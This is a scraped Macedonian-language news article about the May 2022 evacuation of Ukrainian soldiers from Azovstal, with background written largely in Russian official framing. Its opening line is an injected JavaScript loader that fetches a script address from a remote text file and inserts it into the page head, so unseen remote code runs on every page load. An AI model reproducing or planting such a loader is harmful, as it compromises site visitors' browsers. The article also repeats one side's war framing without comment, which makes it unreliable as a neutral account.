;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Зеленски потврди евакуација на војниците од опколената централа Азовстал - Антропол
АктуелноИнтернационално

Зеленски потврди евакуација на војниците од опколената централа Азовстал

Украинскиот претседател Владимир Зеленски во своето видео обраќање потврди дека започнала евакуација на националните трупи од фабриката за производство на челик Азовстал во Мариупол.

‘‘… Негуваме надеж дека ќе ги спасиме животите на нашите момчиња. Меѓу нив има и неколку тешко повредени на кои им треба медицинска помош‘‘ рече Зеленски

Украинскиот претседател рече дека Киев се надева дека ќе ги врати сите дома што е можно поскоро.

‚‚ Работата е во тек за враќање на момчињата дома, но оваа работа е многу деликатна и одзема многу време‘‘, додаде тој

Руското Министерство за Одбрана во понеделникот објави дека е постигнат договор за евакуација на ранетите Украински војници од фабриката за челик Азовстал и за таа цел е отворен хуманитарен коридор.

Министерството додаде дека е воведен прекин на огнот во околината на зафатената област и е отворен хуманитарен коридор за да се обзезбеди излез за ранетите Украински војници да бидат однесени во установа на Новоазовск во Народна Република Доњецк.

Украинската страна претходно објави дека 53 тешко ранети Украински војници биле евакуирани на 16 мај од фабриката Азовстал во Мариупол во Новоазовск, додека уште 211 Украински војници биле евакуирани од местото преку хуманитарен коридор во градот Јеленовка.

На 21 април, рускиот претседател Владимир Путин на состанокот со министерот за одбрана Сергеј Шојгу изјави дека би било неразумно да се нападне Азовстал и ја прекина операцијата, давајки и наредба на војската да ја болкира индустриската зона.

На 4 мај, Шојгу објави дека преостанатите Украински војници биле цврсто затворени во фабриката Азовстал и дека Руските војски продолжуваат со напорите да ги убедат да го остават оружјето и да ги пуштат цивилите.

Руската воена операција во Донбас

Ситуацијата на фронтот во Донбас ескалира на 17 февруари. Народните републики Доњецк и Луганск известија за најмасовните бомбандирања од страна на Украинската војска во последните месеци кои ја оштетија цивилната инфраструктура и предизвикаа цивилни жртви.

На 21 февруари, Рускиот Претседател Владемир Путин објави дека го признава суверенитетот на Народните републики Доњецк и Луганск. Русија ги призна републиките на Донбас во согласност со уставите на ДПР И ЛПР во границите на регионите Доњецк и Луганск од почетокот на 2014 година.

На 24 февруари, Рускиот Претседател Владемир Путин во телевизиско обраќање рече дека како одговор на барањето на шефовите на републиките во Донбас, донел одлука да спроведе специјална воена операција во Украина. Рускиот лидер истакна дека Москва нема планови за окупација на Украинските територии, истакнувајќи дека операцијата има за цел денацификација и демилитаризација на Украина.